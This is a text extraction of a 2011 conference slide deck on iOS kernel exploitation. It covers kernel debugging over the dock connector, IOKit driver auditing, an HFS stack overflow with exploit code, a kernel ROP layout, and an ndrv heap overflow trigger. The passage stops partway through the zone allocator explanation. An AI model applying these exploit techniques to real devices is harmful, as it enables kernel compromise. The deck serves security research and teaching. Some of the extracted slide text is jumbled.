Nothing Special   »   [go: up one dir, main page]

SyScanTaipei2011 StefanEsser iOS Kernel Exploitation IOKit Edition

Download as pdf or txt
Download as pdf or txt
You are on page 1of 107

http://www.sektioneins.

de

iOS Kernel Exploitation


--- IOKIT Edition ---
Stefan Esser <stefan.esser@sektioneins.de>
Who am I?

•Stefan Esser
•from Cologne / Germany
•in information security since 1998
•PHP core developer since 2001
•Month of PHP Bugs and Suhosin
•recently focused on iPhone security (ASLR, jailbreak)
•founder of SektionEins GmbH
•currently also working as independent contractor

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 2


Agenda

• Introduction
• Kernel Debugging
• Auditing IOKit Drivers
• Kernel Exploitation
• Stack Buffer Overflows
• Heap Buffer Overflows
• Kernel patches from Jailbreaks

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 3


Part I
Introduction

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 4


Mac OS X vs. iOS (I)

• iOS is based on XNU like Mac OS X


• exploitation of kernel vulnerabilities is therefore similar
• there are no mitigations inside the kernel e.g. heap/stack canaries
• some kernel bugs can be found by auditing the open source XNU
• some bugs are only/more interesting on iOS

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 5


Mac OS X vs. iOS (II)

OS X iOS

user-land dereference bugs are not user-land dereference bugs are partially
exploitable exploitable

privilege escalation to root privilege escalation to root only beginning


usually highest goal (need to escape sandbox everywhere)

memory corruptions or code exec in memory corruption or code exec inside


kernel nice but usually not required kernel always required

kernel exploits only trigger-able as root kernel exploits only trigger-able as root
are not interesting interesting for untethering exploits

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 6


Types of Kernel Exploits
DYNAMIC CODESIGNING

• normal kernel exploits


• privilege escalation from “mobile“ user in applications
• break out of sandbox
• disable code-signing and RWX protection for easier infection
• must be implemented in 100% ROP

• untethering exploits
• kernel exploit as “root“ user during boot sequence
• patch kernel to disable all security features in order to jailbreak
• from iOS 4.3.0 also needs to be implemented in 100% ROP

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 7


Getting Started

• Best test-device: iPod 4G


• State: jailbroken or development phone
• Software: grab iOS firmware and decrypt kernel
• Testing method: panic logs / kernel debugger

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 8


Part II
Kernel Debugging

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 9


iOS Kernel Debugging

• no support for kernel level debugging by iOS SDK


• developers are not supposed to do kernel work anyway
• strings inside kernelcache indicate the presence of debugging code
• boot arg “debug“ is used
• and code of KDP seems there

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 10


KDP on iOS 4

• the OS X kernel debugger KDP is obviously inside the iOS kernel


• but KDP does only work via ethernet or serial interface
• how to communicate with KDP?
• the iPhone / iPad do not have ethernet or serial, do they?

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 11


iPhone Dock Connector (Pin-Out)

PIN Desc

1,2 GND

3 Line Out - R+

4 Line Out - L+

5 Line In - R+

8
Line In - L+

Video Out
• iPhone Dock Connector has PINs for
- Line Out / In
9 S-Video CHR Output

10 S-Video LUM Output

11 GND

- Video Out
12 Serial TxD

13 Serial RxD

14 NC

15,16

17
GND

NC - USB
18 3.3V Power

19,20
12V Firewire Power
- FireWire
21 Accessory Indicator/Serial Enable

- Serial
22 FireWire Data TPA-

23 USB Power 5 VDC

24 FireWire Data TPA+

25 USB Data -

26 FireWire Data TPB-

27 USB Data +

28 FireWire Data TPB+

29,30 GND

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 12


USB Serial to iPhone Dock Connector

2 x mini-USB-B to USB-A cable

470kΩ resistor

Breakout Board
FT232RL USB to Serial

PodGizmo Connector

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 13


Ingredients (I)

• 470 kΩ resistor
• used to bridge pin 1 and 21
• activates the UART
• costs a few cents

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 14


Ingredients (II)

• PodBreakout
• easy access to dock connector
pins
• some revisions have reversed
pins
• even I was able to solder this
• about 12 EUR

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 15


Ingredients (III)

• FT232RL Breakout Board


• USB to Serial Convertor
• also very easy to solder
• about 10 EUR

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 16


Ingredients (IV)

• USB cables
• type A -> mini type B
• provides us with wires and
connectors
• costs a few EUR

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 17


Final USB and USB Serial Cable

• attaching a USB type A connector to the USB pins is


very useful
• we can now do SSH over USB
• and kernel debug via serial line at the same time
Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 18
GDB and iOS KDP

• GDB coming with the iOS SDK has ARM support


• it also has KDP support
• however it can only speak KDP over UDP
• KDP over serial is not supported

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 19


KDP over serial

• KDP over serial is sending fake ethernet UDP over serial


• SerialKDPProxy by David Elliott is able to act as serial/UDP proxy

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 20


Activating KDP on the iPhone

• KDP is only activated if the boot-arg “debug“ is set


• boot-args can be set with e.g. redsn0w 0.9.8b4
• or faked with a custom kernel
• patch your kernel to get into KDP anytime (e.g. breakpoint in unused syscall)

Name Value Meaning

DB_HALT 0x01 Halt at boot-time and wait for debugger attach.

DB_KPRT 0x08 Send kernel debugging kprintf output to serial port.

... ... Other values might work but might be complicated to use.

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 21


Using GDB...

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 22


Part III
Auditing IOKit Drivers

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 23


IOKit Kernel Extensions

• kernelcache contains prelinked KEXTs in __PRELINK_TEXT segment


• these files are loaded KEXT
• more than 130 of them
• IDA 6.2 can handle this by default
• earlier IDA versions require help from an idapython script

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 24


List all KEXT

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 25


IOKit Driver Classes (I)

• IOKit drivers are implemented in a subset of C++


• classes and their method tables can be found in kernelcache
• main kernel IOKit classes even come with symbols

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 26


IOKit Driver Classes (II) - MetaClass

• most iOS IOKit classes come without symbols


• however IOKit defines for almost all classes a so called MetaClass
• MetaClass contains runtime information about the original object
• constructors of MetaClass‘es leak name and parent objects

R1 = Object Name
R2 = Parent‘s MetaClass
R3 = Methods of MetaClass

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 27


IOKit Object Hierarchy - Full View

all MetaClasses can be found through


xrefs of
__ZN11OSMetaClassC2EPKcPKS_j

allows to determine the names of


almost all IOKit classes (around 760)

and allows to build the


OKit object hierarchy tree

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 28


IOKit Object Hierachy - Zoomed

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 29


Using IOKit Class Hierarchy for Symbols

• most IOKit classes are without symbols


• however they are derived from base IOKit classes with symbols
• we can create symbols for overloaded methods

Some Methods from AppleBasebandUserClient

__const:8043A270 DCD __ZN9IOService12tellChangeUpEm+1__const:8043A274 DCD


__ZN9IOService16allowPowerChangeEm+1__const:8043A278 DCD
__ZN9IOService17cancelPowerChangeEm+1__const:8043A27C DCD
__ZN9IOService15powerChangeDoneEm+1__const:8043A280 DCD
loc_80437D80+1__const:8043A284 DCD
__ZN12IOUserClient24registerNotificationPortEP8ipc_portmy+1__const:8043A288 DCD
__ZN12IOUserClient12initWithTaskEP4taskPvmP12OSDictionary+1__const:8043A28C DCD
__ZN12IOUserClient12initWithTaskEP4taskPvm+1__const:8043A290 DCD
sub_80437D5C+1__const:8043A294 DCD
__ZN12IOUserClient10clientDiedEv+1__const:8043A298 DCD
__ZN12IOUserClient10getServiceEv+1__const:8043A29C DCD
__ZN12IOUserClient24registerNotificationPortEP8ipc_portmm+1__const:8043A2A0 DCD
__ZN12IOUserClient24getNotificationSemaphoreEmPP9semaphore+1

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 30


Using IOKit Class Hierarchy for Symbols

Same Methods from IOUserClient


• most IOKit classes are
__const:80270100
without symbols
DCD __ZN9IOService12tellChangeUpEm+1__const:80270104 DCD
__ZN9IOService16allowPowerChangeEm+1__const:80270108 DCD
• however they are derived from base IOKit classes with
__ZN9IOService17cancelPowerChangeEm+1__const:8027010C
__ZN9IOService15powerChangeDoneEm+1__const:80270110
DCD symbols
DCD
__ZN12IOUserClient14externalMethodEjP25IOExternalMet...__const:80270114 DCD
• we can create symbols for overloaded methods
__ZN12IOUserClient24registerNotificationPortEP8ipc_portmy+1__const:80270118 DCD
__ZN12IOUserClient12initWithTaskEP4taskPvmP12OSDictionary+1__const:8027011C DCD
__ZN12IOUserClient12initWithTaskEP4taskPvm+1__const:80270120 DCD
__ZN12IOUserClient11clientCloseEv+1__const:80270124 DCD
__ZN12IOUserClient10clientDiedEv+1__const:80270128 DCD
Some Methods from AppleBasebandUserClient
__ZN12IOUserClient10getServiceEv+1__const:8027012C DCD
__ZN12IOUserClient24registerNotificationPortEP8ipc_portmm+1__const:80270130 DCD
__const:8043A270 DCD __ZN9IOService12tellChangeUpEm+1__const:8043A274
__ZN12IOUserClient24getNotificationSemaphoreEmPP9semaphore+1 DCD
__ZN9IOService16allowPowerChangeEm+1__const:8043A278 DCD
__ZN9IOService17cancelPowerChangeEm+1__const:8043A27C DCD
__ZN9IOService15powerChangeDoneEm+1__const:8043A280 DCD
loc_80437D80+1__const:8043A284 DCD
__ZN12IOUserClient24registerNotificationPortEP8ipc_portmy+1__const:8043A288 DCD
__ZN12IOUserClient12initWithTaskEP4taskPvmP12OSDictionary+1__const:8043A28C DCD
__ZN12IOUserClient12initWithTaskEP4taskPvm+1__const:8043A290 DCD
sub_80437D5C+1__const:8043A294 DCD
__ZN12IOUserClient10clientDiedEv+1__const:8043A298 DCD
__ZN12IOUserClient10getServiceEv+1__const:8043A29C DCD
__ZN12IOUserClient24registerNotificationPortEP8ipc_portmm+1__const:8043A2A0 DCD
__ZN12IOUserClient24getNotificationSemaphoreEmPP9semaphore+1

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 31


Using IOKit Class Hierarchy for Symbols

 borrowing from the parent class we get


• AppleBasebandUserClient::externalMethod(unsigned int, IOExternalMethodArguments *,
IOExternalMethodDispatch *, OSObject *, void *)

• AppleBasebandUserClient::clientClose(void)

Symbolized Methods from AppleBasebandUserClient

__const:8043A270 DCD __ZN9IOService12tellChangeUpEm+1__const:8043A274 DCD


__ZN9IOService16allowPowerChangeEm+1__const:8043A278 DCD
__ZN9IOService17cancelPowerChangeEm+1__const:8043A27C DCD
__ZN9IOService15powerChangeDoneEm+1__const:8043A280 DCD
__ZN23AppleBasebandUserClient14externalMethodEjP25IOExtern...__const:8043A284 DCD
__ZN12IOUserClient24registerNotificationPortEP8ipc_portmy+1__const:8043A288 DCD
__ZN12IOUserClient12initWithTaskEP4taskPvmP12OSDictionary+1__const:8043A28C DCD
__ZN12IOUserClient12initWithTaskEP4taskPvm+1__const:8043A290 DCD
__ZN23AppleBasebandUserClient11clientCloseEv+1__const:8043A294 DCD
__ZN12IOUserClient10clientDiedEv+1__const:8043A298 DCD
__ZN12IOUserClient10getServiceEv+1__const:8043A29C DCD
__ZN12IOUserClient24registerNotificationPortEP8ipc_portmm+1__const:8043A2A0 DCD
__ZN12IOUserClient24getNotificationSemaphoreEmPP9semaphore+1

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 32


Part IV
Kernel Exploitation - Stack Buffer Overflow

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 33


HFS Legacy Volume Name Stack Buffer Overflow

• Credits: pod2g
• triggers when a HFS image with overlong volume name is mounted
• stack based buffer overflow in a character conversion routine
• requires root permissions
• used to untether iOS 4.2.1 - 4.2.8

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 34


HFS Legacy Volume Name Stack Buffer Overflow
int mac_roman_to_unicode(const Str31 hfs_str, UniChar *uni_str,
__unused u_int32_t maxCharLen, u_int32_t *unicodeChars)
Apple did not fix this function
{ to use maxCharLen... They
... just fix some calls to the
p = hfs_str; function.
maxCharLen parameter
u = uni_str; available but unused

*unicodeChars = pascalChars = *(p++); /* pick up length byte */

while (pascalChars--) { loop counter


c = *(p++); is attacker supplied

if ( (int8_t) c >= 0 ) { /* check if seven bit ascii */


*(u++) = (UniChar) c; /* just pad high byte with zero */
} else { /* its a hi bit character */
UniChar uc; data is copied/encoded
without length check
c &= 0x7F;
*(u++) = uc = gHiBitBaseUnicode[c];
...
}
}
...

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 35


Legacy HFS Master Directory Block

/* HFS Master Directory Block - 162 bytes */


/* Stored at sector #2 (3rd sector) and second-to-last sector. */
struct HFSMasterDirectoryBlock {
u_int16_t drSigWord; /* == kHFSSigWord */
u_int32_t drCrDate; /* date and time of volume creation */
u_int32_t drLsMod; /* date and time of last modification */
u_int16_t drAtrb; /* volume attributes */
u_int16_t drNmFls; /* number of files in root folder */
u_int16_t drVBMSt; /* first block of volume bitmap */
u_int16_t drAllocPtr; /* start of next allocation search */
u_int16_t drNmAlBlks; /* number of allocation blocks in volume */
u_int32_t drAlBlkSiz; /* size (in bytes) of allocation blocks */
u_int32_t drClpSiz; /* default clump size */
u_int16_t drAlBlSt; /* first allocation block in volume */
u_int32_t drNxtCNID; /* next unused catalog node ID */
u_int16_t drFreeBks; /* number of unused allocation blocks */
u_int8_t drVN[kHFSMaxVolumeNameChars + 1]; /* volume name */
u_int32_t drVolBkUp; /* date and time of last backup */
u_int16_t drVSeqNum; /* volume backup sequence number */
...

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 36


Hexdump of Triggering HFS Image

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 37


Exploit Code
int ret, fd; struct vn_ioctl vn; struct hfs_mount_args args;

fd = open("/dev/vn0", O_RDONLY, 0);


if (fd < 0) {
puts("Can't open /dev/vn0 special file.");
exit(1);
}

memset(&vn, 0, sizeof(vn));
ioctl(fd, VNIOCDETACH, &vn);
vn.vn_file = "/usr/lib/exploit.hfs";
vn.vn_control = vncontrol_readwrite_io_e;
ret = ioctl(fd, VNIOCATTACH, &vn);
close(fd);
if (ret < 0) {
puts("Can't attach vn0.");
exit(1);
}

memset(&args, 0, sizeof(args));
args.fspec = "/dev/vn0";
args.hfs_uid = args.hfs_gid = 99;
args.hfs_mask = 0x1c5;
ret = mount("hfs", "/mnt/", MNT_RDONLY, &args);

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 38


now lets analyze the panic log...

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 39


Paniclog

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 40


Paniclog - Zoomed

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 41


Paniclog - Zoomed

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 42


Calling Function

int
hfs_to_utf8(ExtendedVCB *vcb, const Str31 hfs_str, ...)
{
int error;
UniChar uniStr[MAX_HFS_UNICODE_CHARS];
ItemCount uniCount;
size_t utf8len;
hfs_to_unicode_func_t hfs_get_unicode = VCBTOHFS(vcb)->hfs_get_unicode;
error = hfs_get_unicode(hfs_str, uniStr, MAX_HFS_UNICODE_CHARS, &uniCount);
if (uniCount == 0)
error = EINVAL;
if (error == 0) {
error = utf8_encodestr(uniStr, uniCount * sizeof(UniChar), dstStr, &utf8len, maxDstLen , ':', 0);
...

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 43


Calling Function (II)
No stack cookies in kernel

buffer that is overflown

Text

call to
mac_roman_to_unicode()

should be 0
to exit function

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 44


Hexdump of Improved HFS Image

uniCount R4 R5 R6 R7 PC

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 45


Paniclog of Improved HFS Image

THUMB mode

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 46


From Overwritten PC to Code Execution

• once we control PC we can jump anywhere in kernel space


• in iOS a lot of kernel memory is executable
• challenge is to put code into kernel memory
• and to know its address
• nemo‘s papers already show ways to do this for OS X

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 47


Kernel Level ROP
802D2300 RWX page in kernel

xxx r7

xxx r4

80033C08 gadget 2 __text:80033C08 BLX R4__text:80033C0A POP

xxx r7

80067C60 copyin

400 length
src in
20000000 user space

802D2300 RWX page in kernel

803F5BC2 gadget 1 __text:803F5BC2 POP {R0-R2,R4,R7,PC}

• kernel level ROP very attractive because limited amount of different iOS kernel versions

• just copy data from user space to kernel memory

• and return into it

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 48


Back To Our Demo Overflow feasibility of partial address
overwrite seems unlikely

• previous methods not feasible in our situation


• HFS volume name overflow is a unicode overflow
• conversion routine cannot create addresses pointing to kernel space
(>= 0x80000000 & <= 0x8FFFFFFF)

• feasibility of partial address overwrite not evaluated

 this is iOS not Mac OS X => we can return to user space memory

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 49


Returning into User Space Memory
mlock() to hardwire the
memory so that it doesn‘t get
paged out when entering
kernel

• unicode overflow allows us to return to 0x010000 or 0x010001


• exploiting Mac OS X binary needs to map executable memory at this address
• exploit can then mlock() the memory
• and let the kernel just return to this address

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 50


Part V
Kernel Exploitation - Heap Buffer Overflow

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 51


ndrv_setspec() Integer Overflow Vulnerability

• Credits: Stefan Esser


• inside the NDRV_SETDMXSPEC socket option handler
• triggers when a high demux_count is used
• integer overflow when allocating kernel memory
• leads to a heap buffer overflow
• requires root permissions
• used to untether iOS 4.3.1 - 4.3.3

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 52


ndrv_setspec() Integer Overflow Vulnerability
bzero(&proto_param, sizeof(proto_param));
user controlled
proto_param.demux_count = ndrvSpec.demux_count; demux_count

/* Allocate storage for demux array */


MALLOC(ndrvDemux, struct ndrv_demux_desc*, proto_param.demux_count *
sizeof(struct ndrv_demux_desc), M_TEMP, M_WAITOK);
if (ndrvDemux == NULL)
return ENOMEM; integer multiplication
with potential overflow
/* Allocate enough ifnet_demux_descs */
MALLOC(proto_param.demux_array, struct ifnet_demux_desc*,
sizeof(*proto_param.demux_array) * ndrvSpec.demux_count,
M_TEMP, M_WAITOK);
if (proto_param.demux_array == NULL)
error = ENOMEM;

if (error == 0) same integer


overflow
{ therefore THIS is
/* Copy the ndrv demux array from userland */ NOT overflowing
error = copyin(user_addr, ndrvDemux,
ndrvSpec.demux_count * sizeof(struct ndrv_demux_desc));
ndrvSpec.demux_list = ndrvDemux;
}

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 53


ndrv_setspec() Integer Overflow Vulnerability

if (error == 0)
{
/* At this point, we've at least got enough bytes to start looking around */
u_int32_t demuxOn = 0;
because of
proto_param.demux_count = ndrvSpec.demux_count; high demux_count
proto_param.input = ndrv_input; this loop loops
very often
proto_param.event = ndrv_event;

for (demuxOn = 0; demuxOn < ndrvSpec.demux_count; demuxOn++)


{
/* Convert an ndrv_demux_desc to a ifnet_demux_desc */
error = ndrv_to_ifnet_demux(&ndrvSpec.demux_list[demuxOn],
&proto_param.demux_array[demuxOn]);
if (error)
break; we need to be able function converts
} to set error into different
} at some point data format
to stop overflowing lets us overflow !!!

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 54


ndrv_setspec() Integer Overflow Vulnerability
int
ndrv_to_ifnet_demux(struct ndrv_demux_desc* ndrv, struct ifnet_demux_desc* ifdemux)
{
bzero(ifdemux, sizeof(*ifdemux));

if (ndrv->type < DLIL_DESC_ETYPE2)


{
/* using old "type", not supported */
return ENOTSUP;
}
user input can
create these
if (ndrv->length > 28) errors easily
{
return EINVAL;
} writes into
too small buffer

ifdemux->type = ndrv->type;
ifdemux->data = ndrv->data.other;
limited in what
ifdemux->datalen = ndrv->length;
can be written

return 0; BUT IT WRITES A POINTER !!!


}

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 55


Triggering Code (no crash!)
struct sockaddr_ndrv ndrv; int s, i;
struct ndrv_protocol_desc ndrvSpec; char demux_list_buffer[15 * 32];
s = socket(AF_NDRV, SOCK_RAW, 0);
if (s < 0) {
// ...
}
strlcpy((char *)ndrv.snd_name, "lo0", sizeof(ndrv.snd_name));
ndrv.snd_len = sizeof(ndrv); example most
ndrv.snd_family = AF_NDRV; probably does
if (bind(s, (struct sockaddr *)&ndrv, sizeof(ndrv)) < 0) { not crash due
to checks inside
// ...
ndrv_to_ifnet_demux
}

memset(demux_list_buffer, 0x55, sizeof(demux_list_buffer));


for (i = 0; i < 15; i++) {
/* fill type with a high value */
demux_list_buffer[0x00 + i*32] = 0xFF;
demux_list_buffer[0x01 + i*32] = 0xFF;
/* fill length with a small value < 28 */
demux_list_buffer[0x02 + i*32] = 0x04;
high demux_count
demux_list_buffer[0x03 + i*32] = 0x00; triggers
} integer overflow

ndrvSpec.version = 1; ndrvSpec.protocol_family = 0x1234;


ndrvSpec.demux_count = 0x4000000a; ndrvSpec.demux_list = &demux_list_buffer;

setsockopt(s, SOL_NDRVPROTO, NDRV_SETDMXSPEC, &ndrvSpec, sizeof(struct ndrv_protocol_desc));

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 56


MALLOC() and Heap Buffer Overflows

• the vulnerable code uses MALLOC() to allocate memory


• MALLOC() is a macro that calls _MALLOC()
• _MALLOC() is a wrapper around kalloc() that adds a short header (allocsize)
• kalloc() is also a wrapper that uses
• kmem_alloc() for large blocks of memory
• zalloc() for small blocks of memory

 we only concentrate on zalloc() because it is the only relevant allocator here

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 57


Zone Allocator - zalloc()
struct zone {
int count; /* Number of elements used now */
vm_offset_t free_elements;
decl_lck_mtx_data(,lock) /* zone lock */
lck_mtx_ext_t lock_ext; /* placeholder for indirect mutex */
• zalloc() allocates memory in so lck_attr_t lock_attr; /* zone lock attribute */

called zones lck_grp_t lock_grp; /* zone lock group */


lck_grp_attr_t lock_grp_attr; /* zone lock group attribute */
vm_size_t cur_size; /* current memory utilization */
• each zone is described by a zone vm_size_t max_size; /* how large can this zone grow */
vm_size_t elem_size; /* size of an element */
struct and has a zone name vm_size_t alloc_size; /* size used for more memory */
unsigned int

• a zone consists of a number of /* boolean_t */ exhaustible :1, /* (F) merely return if empty? */
/* boolean_t */ collectable :1, /* (F) garbage collect empty pages */
memory pages /* boolean_t */ expandable :1, /* (T) expand zone (with message)? */
/* boolean_t */ allows_foreign :1,/* (F) allow non-zalloc space */
/* boolean_t */ doing_alloc :1, /* is zone expanding now? */
• each allocated block inside a /* boolean_t */ waiting :1, /* is thread waiting for expansion? */
zone is of the same size /* boolean_t */ async_pending :1, /* asynchronous allocation pending? */
/* boolean_t */ doing_gc :1, /* garbage collect in progress? */
/* boolean_t */ noencrypt :1;
• free elements are stored in struct zone * next_zone; /* Link for all-zones list */
call_entry_data_t call_async_alloc; /* callout for asynchronous alloc */
a linked list const char *zone_name; /* a name for the zone */
#if ZONE_DEBUG
queue_head_t active_zones; /* active elements */
#endif /* ZONE_DEBUG */
};

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 58


Zone Allocator - Zones

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 59


Zone Allocator - Adding New Memory
MY_ZONE

head of freelist
0

• when a zone is created or later grown it


starts with no memory and an empty freelist

• first new memory is allocated


(usually a 4k page)

• it is split into the zone‘s element size

• each element is added to the freelist

• elements in freelist are in reverse order

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 60


Zone Allocator - Adding New Memory
MY_ZONE

head of freelist
0

• when a zone is created or later grown it


starts with no memory and an empty freelist

• first new memory is allocated


(usually a 4k page)

• it is split into the zone‘s element size

• each element is added to the freelist

• elements in freelist are in reverse order

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 61


Zone Allocator - Adding New Memory
MY_ZONE

head of freelist
0

• when a zone is created or later grown it


starts with no memory and an empty freelist

• first new memory is allocated


(usually a 4k page)

• it is split into the zone‘s element size

• each element is added to the freelist

• elements in freelist are in reverse order

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 62


Zone Allocator - Adding New Memory
MY_ZONE

head of freelist
1

• when a zone is created or later grown it


1
starts with no memory and an empty freelist

• first new memory is allocated


(usually a 4k page)

• it is split into the zone‘s element size

• each element is added to the freelist

• elements in freelist are in reverse order

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 63


Zone Allocator - Adding New Memory
MY_ZONE

head of freelist
2

• when a zone is created or later grown it


1
starts with no memory and an empty freelist
2
1
• first new memory is allocated
(usually a 4k page)

• it is split into the zone‘s element size

• each element is added to the freelist

• elements in freelist are in reverse order

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 64


Zone Allocator - Adding New Memory
MY_ZONE

head of freelist
3

• when a zone is created or later grown it


1
starts with no memory and an empty freelist
2
2
• first new memory is allocated 3
(usually a 4k page)

• it is split into the zone‘s element size 1

• each element is added to the freelist

• elements in freelist are in reverse order

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 65


Zone Allocator - Adding New Memory
MY_ZONE

head of freelist
4

• when a zone is created or later grown it


1
starts with no memory and an empty freelist
2
3
• first new memory is allocated 3
(usually a 4k page) 4

• it is split into the zone‘s element size 2

• each element is added to the freelist


1
• elements in freelist are in reverse order

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 66


Zone Allocator - Adding New Memory
MY_ZONE

head of freelist
5

• when a zone is created or later grown it


1
starts with no memory and an empty freelist
2
4
• first new memory is allocated 3
(usually a 4k page) 4

5
• it is split into the zone‘s element size 3

• each element is added to the freelist


2
• elements in freelist are in reverse order

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 67


Zone Allocator - Adding New Memory
MY_ZONE

head of freelist
6

• when a zone is created or later grown it


1
starts with no memory and an empty freelist
2
5
• first new memory is allocated 3
(usually a 4k page) 4

5
• it is split into the zone‘s element size 4
6

• each element is added to the freelist


3
• elements in freelist are in reverse order

1 2

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 68


Zone Allocator - Adding New Memory
MY_ZONE

head of freelist
7

• when a zone is created or later grown it


1
starts with no memory and an empty freelist
2
6
• first new memory is allocated 3
(usually a 4k page) 4

5
• it is split into the zone‘s element size 5
6

• each element is added to the freelist 7

4
• elements in freelist are in reverse order

1 2 3

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 69


Zone Allocator - Allocating and Freeing Memory
MY_ZONE

head of freelist
7

2
6
• when memory blocks are allocated they 3
are removed from the freelist 4

5
• when they are freed they are returned 5
to the freelist 6

1 2 3

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 70


Zone Allocator - Allocating and Freeing Memory
MY_ZONE

head of freelist
6

2
5
• when memory blocks are allocated they 3
are removed from the freelist 4

5
• when they are freed they are returned 4
to the freelist 6

1 2

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 71


Zone Allocator - Allocating and Freeing Memory
MY_ZONE

head of freelist
5

2
4
• when memory blocks are allocated they 3
are removed from the freelist 4

5
• when they are freed they are returned 3
to the freelist 6

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 72


Zone Allocator - Allocating and Freeing Memory
MY_ZONE

head of freelist
4

2
3
• when memory blocks are allocated they 3
are removed from the freelist 4

5
• when they are freed they are returned 2
to the freelist 6

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 73


Zone Allocator - Allocating and Freeing Memory
MY_ZONE

head of freelist
3

2
2
• when memory blocks are allocated they 3
are removed from the freelist 4

5
• when they are freed they are returned 1
to the freelist 6

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 74


Zone Allocator - Allocating and Freeing Memory
MY_ZONE

head of freelist
5

2
3
• when memory blocks are allocated they 3
are removed from the freelist 4

5
• when they are freed they are returned 2
to the freelist 6

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 75


Zone Allocator - Allocating and Freeing Memory
MY_ZONE

head of freelist
7

2
5
• when memory blocks are allocated they 3
are removed from the freelist 4

5
• when they are freed they are returned 3
to the freelist 6

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 76


Zone Allocator - Allocating and Freeing Memory
MY_ZONE

head of freelist
6

2
7
• when memory blocks are allocated they 3
are removed from the freelist 4

5
• when they are freed they are returned 5
to the freelist 6

1 2

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 77


Zone Allocator - Allocating and Freeing Memory
MY_ZONE

head of freelist
4

2
6
• when memory blocks are allocated they 3
are removed from the freelist 4

5
• when they are freed they are returned 7
to the freelist 6

1 2 3

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 78


Zone Allocator Freelist

• freelist is as single linked list


• zone struct points to head of freelist
